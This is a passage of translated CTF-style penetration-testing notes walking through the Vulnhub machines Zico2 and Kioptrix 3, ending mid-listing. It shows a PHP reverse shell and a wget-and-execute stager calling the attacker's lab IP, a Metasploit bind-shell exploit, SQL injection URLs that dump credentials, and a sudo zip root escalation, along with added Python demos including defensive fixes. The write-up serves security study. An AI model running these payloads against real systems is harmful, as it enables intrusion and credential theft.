</pre><h3><a name='header-n10008' class='md-header-anchor '></a>Samba exploit</h3><p>The environment also has a Samba vulnerability.</p><p><code>enum4linux</code> enumerates Windows and Samba hosts over SMB and can pull out a lot of sensitive information: user accounts, groups, shares, the password policy and so on.</p><p>In my local environment it did not detect the Samba version, though.</p><p>The vulnerability is the <code>Samba trans2open overflow (Linux x86)</code>, a buffer overflow in Samba 2.2.0 through 2.2.8.</p><p>It can be found with <code>searchsploit</code> as well.</p><p>Here Metasploit is used directly:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf exploit(linux/samba/trans2open) > show options 
 
Module options (exploit/linux/samba/trans2open):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  192.168.43.54   yes       The target address
   RPORT  139              yes       The target port (TCP)
 
 
Payload options (linux/x86/shell_bind_tcp):
 
   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LPORT  4444             yes       The listen port
   RHOST  192.168.43.54   no        The target address
 
 
Exploit target:
 
   Id  Name
   --  ----
   0   Samba 2.2.x - Bruteforce
 
msf exploit(linux/samba/trans2open) > exploit
 
[*] Started bind handler
[*] 192.168.43.54:139 - Trying return address 0xbffffdfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffcfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffbfc...
[*] 192.168.43.54:139 - Trying return address 0xbffffafc...
[*] Command shell session 2 opened (192.168.43.177:33375 -> 192.168.43.54:4444) at 2018-05-07 04:47:42 -0400
 
id
uid=0(root) gid=0(root) groups=99(nobody)
</pre><h2><a name='header-n10023' class='md-header-anchor '></a>Summary</h2><p>This environment is old and some of its vulnerabilities are rarely seen in real engagements, but working through the exploitation teaches the use of the <code>kali linux</code> tooling and some practical methodology.</p><p> </p><h1><a name='header-n10028' class='md-header-anchor '></a>Section 14: Zico2</h1><hr /><p>title: Vulnhub penetration testing practice - Zico2
date: 2018-05-05 22:30:35
categories: Notes</p><h2><a name='header-n10031' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n10035' class='md-header-anchor '></a>Vulnhub environment</h2><h3><a name='header-n10036' class='md-header-anchor '></a>Target</h3><p><a href='https://www.vulnhub.com/entry/zico2-1,210' target='_blank' class='url'>https://www.vulnhub.com/entry/zico2-1,210</a>/</p><h3><a name='header-n10039' class='md-header-anchor '></a>Practice environment</h3><ul><li>Kali Linux 
VirtualBox</li></ul><h2><a name='header-n10045' class='md-header-anchor '></a>Information gathering</h2><p>Before gathering information the target's IP is needed. My target runs in VirtualBox in <code>Host-Only</code> network mode, and there is no way to log in to the target directly and read its IP.</p><p>The Kali tool <code>netdiscover</code>, an ARP-based network scanner, solves this.</p><p>Run <code>netdiscover</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505223944.png' alt='' referrerPolicy='no-referrer' /></p><p>Two IP addresses show up; testing shows the right one is <code>192.168.56.102</code>.</p><p>Next scan the ports with <code>nmap</code>:</p><p><code>nmap -A 192.168.56.102</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/QQ%E6%88%AA%E5%9B%BE20180505224409.png' alt='' referrerPolicy='no-referrer' /></p><p>Port 80 runs a web server.</p><p>Visit the web service; at this point the usual scanners can be run against the site.</p><h2><a name='header-n10066' class='md-header-anchor '></a>Exploitation</h2><p>Browsing the pages quickly reveals a file inclusion vulnerability:</p><pre class="md-fences mock-cm md-end-block" lang="">view.php?page=tools.html
</pre><p>Try including <code>../../etc/passwd</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The include works. Next, scan the directories. Because of the campus network only <code>Host-Only</code> mode was possible, so every step is done from <code>Kali</code>.</p><p>The directory brute-forcer <code>dirb</code> that ships with <code>kali</code> does the scan:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_2.png' alt='' referrerPolicy='no-referrer' /></p><p>It finds a <code>dbadmin</code> directory:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_3.png' alt='' referrerPolicy='no-referrer' /></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_4.png' alt='' referrerPolicy='no-referrer' /></p><p>The application is <code>phpLiteAdmin</code>, version <code>v1.9.3</code>.</p><p>Looking for known vulnerabilities in this version: it has a remote PHP code injection vulnerability.</p><p>The details can be found with a search engine, or with <code>Searchsploit</code>, the Kali command-line front end to Exploit-DB:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_5.png' alt='' referrerPolicy='no-referrer' /></p><p>The advisory shows that exploiting the remote PHP code injection requires being logged in.</p><p>The default password <code>admin</code> logs straight in.</p><p>According to the <code>exploit-db</code> entry, create a database and write a shell into it.</p><p>The reverse shell can be caught with nc on a listening port, or msf can generate a PHP payload and listen for it.</p><p>Create the database as <code>exploit-db</code> describes: directly create a database named <code>shell</code> with the extension <code>.php</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_6.png' alt='' referrerPolicy='no-referrer' /></p><p>and add a table:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_7.png' alt='' referrerPolicy='no-referrer' /></p><p>Create a txt file in the local <code>/var/www/html</code> directory containing the reverse shell:</p><pre class="md-fences mock-cm md-end-block" lang="">&lt;?php $sock=fsockopen("192.168.56.101",2333);exec("/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3");?&gt;
</pre><p>Then start the Apache web server:</p><pre class="md-fences mock-cm md-end-block" lang="">service apache2 start
</pre><p>Back in the database, add a field of type <code>TEXT</code> whose value is PHP code that downloads and runs the shell:</p><pre class="md-fences mock-cm md-end-block" lang="">&lt;?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; php /tmp/shell.php"); ?&gt;
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_8.png' alt='' referrerPolicy='no-referrer' /></p><p>The target now has to execute that code, which takes an HTTP request.</p><p>This is where the local file inclusion found earlier comes in.</p><p>The database page shows the path of the malicious database file:</p><pre class="md-fences mock-cm md-end-block" lang="">/usr/databases/shell.php
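</pre><p>Why this works is worth seeing concretely: SQLite writes TEXT cell values into the database file verbatim, so a database whose name ends in <code>.php</code> and whose table holds a <code>&lt;?php ... ?&gt;</code> string is, to PHP's include, a file with some binary noise around a valid PHP block (the noise is echoed as output, the block is executed). The Python script below, an added example rather than the author's code, reproduces with the sqlite3 module what phpLiteAdmin does on the server and checks the resulting file bytes. The attacker IP, the database directory and the LFI parameter are taken from this write-up; the temporary path it writes to is its own.</p>

```python
"""Plant PHP inside an SQLite database file, as the phpLiteAdmin trick does.

Added example for the Zico2 walkthrough; not code from the original page.
Values from the write-up: attacker 192.168.56.101, database directory
/usr/databases, LFI parameter view.php?page=.  The temp file path below is
this script's own.
"""
import os
import sqlite3
import tempfile

# The same stager the write-up stores in the TEXT column.
PAYLOAD = ('<?php system("wget 192.168.56.101/shell.txt -O /tmp/shell.php; '
           'php /tmp/shell.php"); ?>')


def plant(db_path, payload=PAYLOAD):
    """Create the database (named shell.php on the target) with one TEXT cell
    holding the payload.  This is exactly the sequence done by hand in
    phpLiteAdmin: create database, create table, insert a row."""
    con = sqlite3.connect(db_path)
    try:
        con.execute("CREATE TABLE IF NOT EXISTS t (c TEXT)")
        con.execute("INSERT INTO t (c) VALUES (?)", (payload,))
        con.commit()
    finally:
        con.close()


def payload_is_verbatim(db_path, payload=PAYLOAD):
    """True if the file is an SQLite database AND the PHP tag appears in it
    byte-for-byte: the stored value is neither encoded nor compressed, which
    is the property the file-inclusion step relies on."""
    with open(db_path, "rb") as fh:
        data = fh.read()
    return data.startswith(b"SQLite format 3\x00") and payload.encode() in data


def lfi_url(db_path="/usr/databases/shell.php", depth=2,
            base="http://192.168.56.102/view.php?page="):
    """Build the include URL.  depth is the traversal depth that reached
    /etc/passwd earlier (two levels in the write-up); adjust if needed."""
    return base + "../" * depth + db_path.lstrip("/")


def demo():
    """Plant into a temporary file and verify; returns True on success."""
    tmpdir = tempfile.mkdtemp()
    path = os.path.join(tmpdir, "shell.php")
    plant(path)
    ok = payload_is_verbatim(path)
    os.remove(path)
    os.rmdir(tmpdir)
    return ok


if __name__ == "__main__":
    print("payload stored verbatim:", demo())
    print("include via LFI:", lfi_url())
```

<p>Running it locally shows the PHP tag sitting intact inside the SQLite page; on the target the same file lands wherever phpLiteAdmin's configured directory points, which is the path shown above.</p><pre class="md-fences mock-cm md-end-block" lang="">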
</pre><p>First listen with nc on the port set earlier, <code>2333</code>, then include that path through the file inclusion:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_9.png' alt='' referrerPolicy='no-referrer' /></p><p>This gives a reverse shell.</p><h2><a name='header-n10134' class='md-header-anchor '></a>Privilege escalation</h2><p>With the shell, looking through the directories shows</p><p>a <code>wordpress</code> directory under /home/zico, a common CMS.</p><p>Read its wp-config.php:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_10.png' alt='' referrerPolicy='no-referrer' /></p><p>It contains user zico's credentials, which also work over <code>ssh</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">ssh zico@192.168.56.102
</pre><p>Use <code>sudo -l</code> to see which commands the user may and may not run:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_11.png' alt='' referrerPolicy='no-referrer' /></p><p>User <code>zico</code> may run <code>tar</code> and <code>zip</code> as root without a password.</p><p>Create an arbitrary file with <code>touch exploit</code> and compress it with <code>zip</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">sudo zip exploit.zip exploit -T --unzip-command="python -c 'import pty; pty.spawn(\"/bin/sh\")'"
</pre><ul><li>sudo: run with root privileges</li><li>-T: test the archive's integrity. This makes zip run the next option, --unzip-command, which is given a Python interactive shell instead of unzip; because zip itself runs as root, so does the shell</li></ul><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_12.png' alt='' referrerPolicy='no-referrer' /></p><p>That gives <code>root</code>, and the <code>/root</code> directory is now accessible:</p><p><code>cat /root/flag.txt</code> gives the flag.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/vlunhub_zico2_13.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10169' class='md-header-anchor '></a>Summary</h2><ul><li>Vulnhub offers many different environments to practise on; this was my first complete penetration from start to finish and I learned a lot.</li><li>At the start of the article the <code>kali linux</code> tool <code>netdiscover</code>, an ARP-based network scanner, was used. I remember an interview write-up in which a candidate was asked why ARP is used to probe hosts on the internal network; his answer was that it is quite stealthy and gives more accurate results. The main reason is that the traditional way to check whether a remote host is alive is the ICMP echo reply (ping), and many hosts block ICMP at the firewall to avoid scanners, which hides them on the network.</li><li>Interactive shells in two languages were used in the article, php and python, following the <a href='http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet'>Reverse Shell Cheat Sheet</a>.</li><li>My own hands-on experience with privilege escalation is very limited; this exercise taught me the trick of creating an arbitrary file with <code>touch exploit</code> and compressing it with <code>zip</code>, which goes to show how little practical experience I have.</li><li>Finally, a word on the importance of English: the blogs of foreign experts are very rich, and for someone who scraped through CET-4 with 425 there is nothing for it but Baidu Translate.</li></ul><p> </p><h1><a name='header-n10180' class='md-header-anchor '></a>Section 15: Kioptrix 3</h1><hr /><p>title: Vulnhub penetration testing practice - Kioptrix 3
date: 2018-05-08 20:01:26
categories: Notes</p><h2><a name='header-n10183' class='md-header-anchor '></a>Author: Ukonw</h2><h2><a name='header-n10187' class='md-header-anchor '></a>Information gathering</h2><p>Again find the target with <code>netdiscover</code>.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# netdiscover 
 
 Currently scanning: 192.168.194.0/16   |   Screen View: Unique Hosts          
                                                                                
 13 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 780              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.43.1    ac:c1:ee:31:3f:25      6     360  Xiaomi Communications Co Ltd
 192.168.43.33   44:03:2c:68:d8:0f      2     120  Intel Corporate             
 192.168.43.58   00:0c:29:b2:76:40      4     240  VMware, Inc.                
 192.168.43.158  00:0c:29:38:2d:6f      1      60  VMware, Inc. 
</pre><p>The target IP is <code>192.168.43.158</code>.</p><p>Scan its ports with nmap:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">root@kali:~# nmap -A -sS -n 192.168.43.158
Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-08 07:45 EDT
Nmap scan report for 192.168.43.158
Host is up (0.00053s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey: 
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:38:2D:6F (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
 
TRACEROUTE
HOP RTT     ADDRESS
1   0.53 ms 192.168.43.158
 
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.91 seconds
 
</pre><p>The scan shows:</p><ul><li>22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)</li><li>80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)</li><li>OS details: Linux 2.6.9 - 2.6.33</li></ul><p> </p><p>Port 80 shows the CMS is <code>LotusCMS</code>.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_4.png' alt='' referrerPolicy='no-referrer' /></p><p>Scan the site's directories with <code>dirb</code> (Yujian, the Windows directory scanner, works too). There is a <code>phpmyadmin</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_5.png' alt='' referrerPolicy='no-referrer' /></p><p>CMS admin panel: <code>http://192.168.43.158/index.php?system=Admin</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><h2><a name='header-n10218' class='md-header-anchor '></a>Exploitation</h2><h3><a name='header-n10220' class='md-header-anchor '></a>File inclusion &amp; admin upload</h3><p>Visit the web service on port 80.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_1.png' alt='' referrerPolicy='no-referrer' /></p><p>The URL looks suspicious:</p><p><code>http://192.168.43.158/index.php?system=Blog</code></p><p>Try <code>system=../../../../../etc/passwd</code>:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_2.png' alt='' referrerPolicy='no-referrer' /></p><p>That does not work. Adding a <code>%00.</code> null-byte truncation does, and <code>/etc/passwd</code> is read (this is PHP 5.2.4; only PHP versions before 5.3.4 still honour a NUL byte in include paths):</p><p><code>http://192.168.43.158/index.php?system=../../../../../../../../etc/passwd%00.</code></p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_3.png' alt='' referrerPolicy='no-referrer' /></p><p>Combined with the admin password that sqlmap recovers later, this gives a shell.</p><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.43.177 LPORT=443 -f raw > /tmp/evil.jpg
No platform was selected, choosing Msf::Module::Platform::PHP from the payload
No Arch selected, selecting Arch: php from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 1114 bytes
</pre><p>Generate an image-wrapped PHP payload with <code>msfvenom</code> (above), then upload it through the gallery back-end where photos are accepted: edit an existing photo, replace the file, and note the name the gallery stores it under. Start an <code>msf</code> listener, then include the uploaded file through the file inclusion. This step is somewhat contrived: the inclusion needs the file's absolute path, which the LFI alone does not reveal (here it is known only because the command-execution shell later shows the web root, <code>/home/www/kioptrix3.com</code>).</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/index.php?system=../../../../../../../home/www/kioptrix3.com/gallery/photos/thumb_1a2o44437j.jpg%00.
</pre><p>Requesting that URL returns a shell to the handler:</p><pre class="md-fences mock-cm md-end-block" lang="" style="break-inside: unset;">msf > use multi/handler
msf exploit(multi/handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set LHOST 192.168.43.177
LHOST => 192.168.43.177
msf exploit(multi/handler) > set LPORT 443
LPORT => 443
msf exploit(multi/handler) > run
 
[*] Started reverse TCP handler on 192.168.43.177:443 
[*] Sending stage (37775 bytes) to 192.168.43.158
[*] Meterpreter session 1 opened (192.168.43.177:443 -> 192.168.43.158:51226) at 2018-05-08 12:53:09 -0400
 
meterpreter > ls
Listing: /home/www/kioptrix3.com
================================
 
Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
40777/rwxrwxrwx   4096   dir   2011-04-15 09:21:17 -0400  cache
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  core
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  data
100644/rw-r--r--  23126  fil   2011-04-14 12:23:13 -0400  favicon.ico
40755/rwxr-xr-x   4096   dir   2011-04-14 11:32:31 -0400  gallery
100644/rw-r--r--  26430  fil   2011-04-14 12:23:13 -0400  gnu-lgpl.txt
100644/rw-r--r--  399    fil   2011-04-14 12:23:13 -0400  index.php
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  modules
40777/rwxrwxrwx   4096   dir   2011-04-14 12:24:17 -0400  style
100644/rw-r--r--  243    fil   2011-04-14 12:23:13 -0400  update.php
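</pre><p>The <code>%00.</code> trick above is worth seeing in code. The Python below is an added example for this write-up (not LotusCMS code): it models how a pre-5.3.4 PHP <code>include()</code> truncates the path at the NUL byte, which is why the plain traversal failed and the <code>%00.</code> variant read <code>/etc/passwd</code>, and contrasts it with an allow-listed loader. The module directory and the <code>.php</code> suffix are assumptions about how the CMS builds the path; <code>classify()</code> is the kind of rule a log review or WAF would use on the <code>system</code> parameter.</p><pre class="md-fences mock-cm md-end-block" lang="python">
```python
"""Null-byte truncation in a pre-5.3.4 PHP include(), and an allow-listed loader.

Added example for this write-up, not LotusCMS code. The vulnerable builder
assumes the CMS forms the include path as MODULE_DIR + '/' + $_GET['system']
+ '.php'; the real LotusCMS source is not shown on the page, and the module
directory name is an assumption too.
"""
import posixpath
from urllib.parse import unquote

WEB_ROOT = "/home/www/kioptrix3.com"        # from the meterpreter listing
MODULE_DIR = WEB_ROOT + "/modules"          # assumed include directory
SUFFIX = ".php"                             # assumed fixed suffix


def php_include_path(user_value, null_byte_truncates):
    """Return the path PHP would really open for the given ?system= value.

    PHP before 5.3.4 passed the path to the C library as a NUL-terminated
    string, so everything after the first NUL (the %00 in the URL) was
    silently dropped, together with the suffix the application appended.
    Later versions refuse paths that contain a NUL byte.
    """
    path = MODULE_DIR + "/" + unquote(user_value) + SUFFIX
    if null_byte_truncates and "\x00" in path:
        path = path.split("\x00", 1)[0]
    return posixpath.normpath(path)


def safe_include_path(user_value, allowed_modules):
    """Hardened loader: allow-list the module name, then re-check the path.

    The allow-list alone defeats both traversal and the NUL trick; the
    prefix check is a second, independent guard in case the list is ever
    loosened to accept user-supplied sub-paths.
    """
    name = unquote(user_value)
    if name not in allowed_modules:
        raise ValueError("unknown module: %r" % name)
    path = posixpath.normpath(MODULE_DIR + "/" + name + SUFFIX)
    if not path.startswith(MODULE_DIR + "/"):
        raise ValueError("resolved path leaves the module directory")
    return path


def loader_rejects(user_value, allowed_modules):
    """True when the hardened loader refuses the value."""
    try:
        safe_include_path(user_value, allowed_modules)
    except ValueError:
        return True
    return False


def classify(user_value):
    """Label a ?system= value the way a log review or WAF rule would."""
    decoded = unquote(user_value)
    if "\x00" in decoded:
        return "null-byte-truncation"
    if ".." in decoded.split("/"):
        return "path-traversal"
    return "plain"


if __name__ == "__main__":
    # Constructed requests mirroring the three attempts in the write-up.
    attempts = [
        "Blog",
        "../../../../../etc/passwd",
        "../../../../../../../../etc/passwd%00.",
    ]
    for value in attempts:
        print("%-42s %-20s old PHP opens %r, new PHP opens %r" % (
            value, classify(value),
            php_include_path(value, True),
            php_include_path(value, False)))
```
</pre><p>Run it to see the three attempts from the write-up side by side. On a current PHP the NUL byte is rejected outright, but the traversal is still there; the real fix is the allow-list, not the PHP upgrade.</p><pre class="md-fences mock-cm md-end-block" lang="" style="display:none">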
</pre><p>The shell obtained this way has limited privileges; many commands fail.</p><h3><a name='header-n10259' class='md-header-anchor '></a>SQL injection with sqlmap</h3><p>Some of the site's links are broken: they 302-redirect to <code>kioptrix3.com</code>. Add the name to <code>/etc/hosts</code> on the attacking machine:</p><pre class="md-fences mock-cm md-end-block" lang="">192.168.43.158  kioptrix3.com
</pre><p>Restart networking with <code>service networking restart</code> if you like; strictly, edits to <code>/etc/hosts</code> take effect immediately and no restart is needed.</p><p>The URL <code>kioptrix3.com/gallery/gallery.php?id=1&amp;sort=photoid#photos</code> is SQL-injectable.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_7.png' alt='' referrerPolicy='no-referrer' /></p><p>Test it with <code>sqlmap</code> first: the <code>id</code> parameter is vulnerable to error-based injection.</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_8.png' alt='' referrerPolicy='no-referrer' /></p><p>Now look for the back-end administrator account and password.</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: dev_accounts
[2 entries]
+----+------------+---------------------------------------------+
| id | username   | password                                    |
+----+------------+---------------------------------------------+
| 1  | dreg       | 0d3eccfb887aabd50f243b3f155c0f85 (Mast3r)   |
| 2  | loneferret | 5badcaf789d3d1d09794d8f021f40f0e (starwars) |
+----+------------+---------------------------------------------+
</pre><p>These are account credentials, but they do not work at the CMS login seen earlier:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_6.png' alt='' referrerPolicy='no-referrer' /></p><p>There is a second login at <code>http://kioptrix3.com/gallery/gadmin/</code>, and the gallery keeps its own user table:</p><pre class="md-fences mock-cm md-end-block" lang="">Database: gallery
Table: gallarific_users
[2 entries]
+----------+----------+
| username | password |
+----------+----------+
| admin    | n0t7t1k4 |
+----------+----------+
 
</pre><p>The <code>admin</code> / <code>n0t7t1k4</code> pair does log into the gallery admin.</p><p>Although the injection runs as <code>root</code> with DBA privileges, the web root's absolute path is unknown at this point, so sqlmap cannot be used directly to write a shell: <code>--os-shell</code> and <code>INTO OUTFILE</code> both need a known, writable path.</p><h3><a name='header-n10291' class='md-header-anchor '></a>Manual SQL injection</h3><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,2,3,4,5,6#
</pre><p>The query has six columns: the <code>union</code> only succeeds once the column count matches.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,version(),database(),4,5,6#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_9.png' alt='' referrerPolicy='no-referrer' /></p><p>This returns the current database name and the MySQL version.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(table_name),3,4,5,6%20from%20information_schema.tables%20where%20table_schema%20=%20database()#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_10.png' alt='' referrerPolicy='no-referrer' /></p><p>This lists every table in the current database.</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(column_name),3,4,5,6%20FROM%20information_schema.columns%20WHERE%20table_name%20=0x6465765f6163636f756e7473#
</pre><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_11.png' alt='' referrerPolicy='no-referrer' /></p><p>This returns the column names of <code>dev_accounts</code> (the table name is passed as the hex literal <code>0x6465765f6163636f756e7473</code> so that no quotes are needed). Finally, dump the credentials, joining user name and password with <code>0x3a</code>, a colon:</p><pre class="md-fences mock-cm md-end-block" lang="">http://kioptrix3.com/gallery/gallery.php?id=1%20union%20select%201,group_concat(username,0x3a,password),3,4,5,6%20FROM%20dev_accounts#
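</pre><p>The four queries above are the whole extraction chain. As an added example (neither the gallery's PHP nor the author's code), the Python below replays that chain against an in-memory SQLite copy of a string-concatenated <code>gallery.php?id=</code> query, beside the parameterised form that defeats it. Only the <code>dev_accounts</code> columns and rows come from the page; the photos table is an invented stand-in, and SQLite's <code>sqlite_master</code>, <code>pragma_table_info</code> and the literal <code>':'</code> take the place of MySQL's <code>information_schema</code> and <code>0x3a</code>.</p><pre class="md-fences mock-cm md-end-block" lang="python">
```python
"""The union-based extraction chain, replayed offline against SQLite.

Added example for this write-up; it is neither the gallery's PHP nor the
author's code. Only the dev_accounts columns (id, username, password) and
its two rows come from the page; the photos table is an invented stand-in
for whatever gallery.php really selects six columns from. Two MySQL-isms
are swapped for SQLite equivalents: information_schema becomes
sqlite_master / pragma_table_info, and the hex literal 0x3a becomes ':'.
"""
import sqlite3

SIX_COLUMNS = "photoid, title, description, filename, ownerid, views"


def build_db():
    """In-memory copy of the relevant part of the `gallery` database."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE photos(photoid INTEGER, title TEXT, description TEXT,
                            filename TEXT, ownerid INTEGER, views INTEGER);
        INSERT INTO photos VALUES (1, 'first', 'demo photo', 'thumb_demo.jpg', 1, 0);
        CREATE TABLE dev_accounts(id INTEGER, username TEXT, password TEXT);
        INSERT INTO dev_accounts VALUES (1, 'dreg', '0d3eccfb887aabd50f243b3f155c0f85');
        INSERT INTO dev_accounts VALUES (2, 'loneferret', '5badcaf789d3d1d09794d8f021f40f0e');
    """)
    return db


def vulnerable_gallery(db, photo_id):
    """gallery.php as it evidently behaves: the id is pasted into the SQL text."""
    sql = "SELECT " + SIX_COLUMNS + " FROM photos WHERE photoid=" + photo_id
    return db.execute(sql).fetchall()


def fixed_gallery(db, photo_id):
    """Same query, parameterised: the id is bound as data, never parsed as SQL."""
    if not photo_id.isdigit():
        return []
    sql = "SELECT " + SIX_COLUMNS + " FROM photos WHERE photoid=?"
    return db.execute(sql, (int(photo_id),)).fetchall()


def find_column_count(db, limit=12):
    """Step 1 of the manual chain: widen `union select 1,2,...` until it parses."""
    for n in range(1, limit + 1):
        probe = "1 union select " + ",".join(str(i) for i in range(1, n + 1))
        try:
            vulnerable_gallery(db, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def union_leak(db, expression, source):
    """Put `expression` in column 2 of the union and read it back via the marker.

    Column 3 carries the literal 3, so the injected row can be picked out
    no matter where UNION places it in the result.
    """
    payload = "1 union select 1," + expression + ",3,4,5,6 " + source
    rows = vulnerable_gallery(db, payload)
    injected = [row for row in rows if row[2] == 3]
    return injected[0][1]


# Steps 3 to 5 of the chain: table names, column names, then the credentials.
TABLES = ("group_concat(name)", "from sqlite_master where type='table'")
COLUMNS = ("group_concat(name)", "from pragma_table_info('dev_accounts')")
CREDENTIALS = ("group_concat(username || ':' || password)", "from dev_accounts")


if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    for label, (expr, src) in (("tables", TABLES), ("columns", COLUMNS),
                               ("credentials", CREDENTIALS)):
        print(label + ":", union_leak(db, expr, src))
    print("parameterised query given the payload:",
          fixed_gallery(db, "1 union select 1,2,3,4,5,6"))
```
</pre><p>The marker column (the literal <code>3</code>) is how the injected row is told apart from the real one; it is the same reason the manual queries keep <code>3,4,5,6</code> in place and only swap column 2.</p><pre class="md-fences mock-cm md-end-block" lang="" style="display:none">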
</pre><p>The dump query returns the <code>dev_accounts</code> rows:</p><p><img src='http://obr4sfdq7.bkt.clouddn.com/kioptrix_3_12.png' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n10315' class='md-header-anchor '></a>Lotus CMS vulnerabilities</h3><pre class="md-fences mock-cm md-end-block" lang="">root@kali:~# searchsploit Lotus CMS
------------------------------------------------------- ----------------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------------
Lotus CMS Fraise 3.0 - Local File Inclusion / Remote C | exploits/php/webapps/15964.py
Lotus Core CMS 1.0.1 - Remote File Inclusion           | exploits/php/webapps/5866.txt
LotusCMS 3.0 - 'eval()' Remote Command Execution (Meta | exploits/php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities              | exploits/php/webapps/16982.txt
------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
</pre><p>The results list a local file inclusion and a remote code execution. The local file inclusion is the one found earlier; the published exploit for it did not work here.</p><p><code>LotusCMS 3.0 - 'eval()' Remote Command Execution</code> is a Metasploit module (an <code>.rb</code> file), so search for it in <code>msfconsole</code>:</p><pre class="md-fences mock-cm md-end-block" lang="">msf > search LotusCMS
 
Matching Modules
================
 
   Name                              Disclosure Date  Rank       Description
